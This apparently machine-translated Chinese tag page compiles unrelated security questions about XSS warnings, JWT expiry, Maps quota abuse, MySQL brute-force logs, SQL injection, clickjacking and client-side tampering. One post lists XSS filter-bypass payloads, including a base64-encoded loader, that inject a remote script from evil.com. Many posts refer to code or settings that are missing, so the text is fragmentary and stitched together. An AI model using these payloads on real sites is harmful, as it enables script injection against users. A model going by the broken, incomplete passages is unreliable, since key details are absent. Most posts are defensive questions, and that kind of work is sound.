问题标签 [client-side-attacks]

每次打开 Firefox 时，我都会收到此错误。我安装了 NoScript。也没有打开任何与该网站有关的选项卡。我尝试清除我的缓存和本地内容，但它仍然不断出现。

NoScript 检测到从 [...] 到https://smartfonts.com的潜在跨站点脚本攻击。可疑数据：（网址） https://smartfonts.com/ {{metaImage}}

可以提交跨站点脚本 (XSS) 模式。

如果我删除 ValidateInput(false) Tag 它会引发异常。“潜在危险……”

Web.config 设置如下

传入的请求将始终具有 XML 字符串。

是否有任何属性或不需要添加 validateInput(False) 并允许 XMl.

请提供您的输入。

先感谢您。

我发现了一个容易受到 XSS 攻击的 Web 应用程序，并且可以使用img标记运行一些 javascript，但是我使用的方法会破坏页面的其余部分，因为他们正在使用一些过滤器来尝试阻止它。

到目前为止我检测到的过滤器如下：

• </anythingyouwant>被什么都取代
• />被什么都取代
• ;被替换为空格，直到下一个>
• 135 个字符限制，包括交货方式<img src="." onerror="alert('xss')">

注入<img src="." onerror="alert('xss')">工作正常，但是这些开发人员相当怀疑并希望看到完整的 JavaScript 代码的完整 PoC。是否可以运行任意脚本？

我试过了：

• <img src="." onerror="eval(atob('Yj1kb2N1bWVudDthPWIuY3JlYXRlRWxlbWVudCgnc2NyaXB0Jyk7YS5zcmM9Jy8vZXZpbC5jb20vbXlzY3JpcHQnO2IuYm9keS5hcHBlbmRDaGlsZChhKQ=='))">结果：太长，即使是缩短的 URL
• <script src="//evil.com/myscript" />结果：不能像那样关闭脚本标签，它会被过滤，并通过网络应用程序省略“关闭”标签来破坏页面的其余部分
• <script src=//evil.com/myscript"></script>结果：被过滤，如上所述破坏页面的其余部分
• <img src="." onerror="b=document;a=b.createElement('script');a.src='//evil.com/myscript';b.body.appendChild(a)">结果：分号被过滤，破坏网页
• <img src="." onerror="b=document a=b.createElement('script') a.src='//evil.com/myscript' b.body.appendChild(a)">结果：我不确定这是否是有效的 js，但它按预期出现在 chromeview page source中，但不能按预期工作

我正在使用 chrome 进行测试，以防万一它以某种方式相关。

我正在构建一个带有 jwt 身份验证的 nodejs 服务器。

目前我的 jwts 有 1 个月的到期时间。如果用户进入登录页面，我会检查他的请求是否包含有效的 jwt，如果是，他不必输入用户名和密码。如果他注销，jwt 会在客户端被删除，因此用户下次必须使用他的凭据登录。

如果攻击者监听连接（我已经在使用 ssl）并获取令牌怎么办。即使用户注销并在下一次会话中获得新令牌，攻击者也可以使用旧令牌冒充用户，只要它是有效的，对吗？

1. 将用户的“当前”令牌的IAT存储在数据库中并将其与请求中令牌的IAT进行比较以避免攻击者的访问是否是一个好主意？

2. 我知道，1 个月对于 jwt 来说是相当长的时间。我也有想法在每次客户端登录时生成一个新令牌（有效期为 2 天）。但是，如果攻击者只获得 1 个有效令牌，他也会获得新令牌，不是吗？

你有什么建议吗？

谢谢，干杯！

假设我在我的网站上添加了一张地图，我将如何通过无限期刷新页面以用完我的配额并因此增加我的账单来防止用户用尽我的配额？

我通过运行 Selenium 脚本测试了这种情况，似乎每次刷新都计入配额使用量。它有缓解吗？

我已经生成了攻击面分析报告。并遇到了一个与易受攻击的命名管道相关的安全问题。并且描述是“管道 SafeNet-SentinelPIPE-3420-5088 上的 ACL 允许多个非管理员帐户篡改。”

我已经检查了命名管道的代码。我没有在我的应用程序中使用任何命名管道，但我在附加表面分析器报告中遇到了这个安全问题。我已经签入了服务和窗口，无论我使用的是任何命名管道——Safenet 还是 SentinelPipe。

向大家提一个问题：

我的 MysqlLogs 有 200 000 + [注意] 用户 'root'@'122.224.33.184' 的访问被拒绝（使用密码：是）

具有多个用户名（ Magento / root / Admin / user / developer/dev 等...）

选择从数据库中的 0 到 11K 连接（这使得网站 ULTRA SLO 你不能买任何东西）

你怎么看 ？我有一个拥有 200 000 个用户的电子商务网站 这只是机器人扫描还是有针对性的攻击（可能是黑色星期五）？

我们在 amazon lightsail（私人数据库），Wordpress 前面（不要评判我）

黑客到达了我的数据库用户列表和其他表。

首先，我通过使用在所有事务中使用参数化命令

所有事务都是存储过程。

我将每个站点导航插入数据库。具体数据库表如下；

项目UserID从代码中获取信息是否打开了会话。

CreatedAt是DateTime.UtcNow。

IPAddress代码如下：

但是URL，从网站当前 URL 填充所有查询字符串。( Request.RawUrl)

通常，当用户访问该站点时，如上所述，Log 会插入到数据库中。正常插入以下记录。示例数据如下所示：

黑客以某种方式将一条记录插入数据库，如下所示：

如您所见IPAddress，专栏是 SQL 查询攻击。IPAddress字段长度限制为 25 个字符。以下 SQL 查询文本被 SQL 截断。

URL在我看来，黑客通过更改或IPAddress作为 SQL 脚本使用 SQL 注入来获取数据库记录。

知道黑客是如何到达我的数据库的，以及从现在开始如何避免攻击吗？

编辑

存储过程如下：

存储过程的用法如下：

我添加了

在header.tpl文件中，但它不起作用并引发错误。

X-Frame-Options 只能通过与文档一起发送的 HTTP 标头来设置。里面可能没有设置。

我还添加了

.htaccess文件中的行。但这也行不通。

那么如何防止我的网站上的点击劫持？

供参考： 点击劫持防御备忘单 | OWASP和X-Frame-Options - HTTP

这是一个简单的函数，它使用 AJAX 并在单击按钮时获取数据库中 id=219 的图像信息

任何加载此网页的人都可以通过转到源代码来更改 javascript 代码。然后通过单击按钮，他将运行修改后的代码（例如将 image_id 从 219 更改为 300）。所以他可以通过改变 image_id 来获取任何图像的信息

问题是如何防范客户端攻击或 XSS ？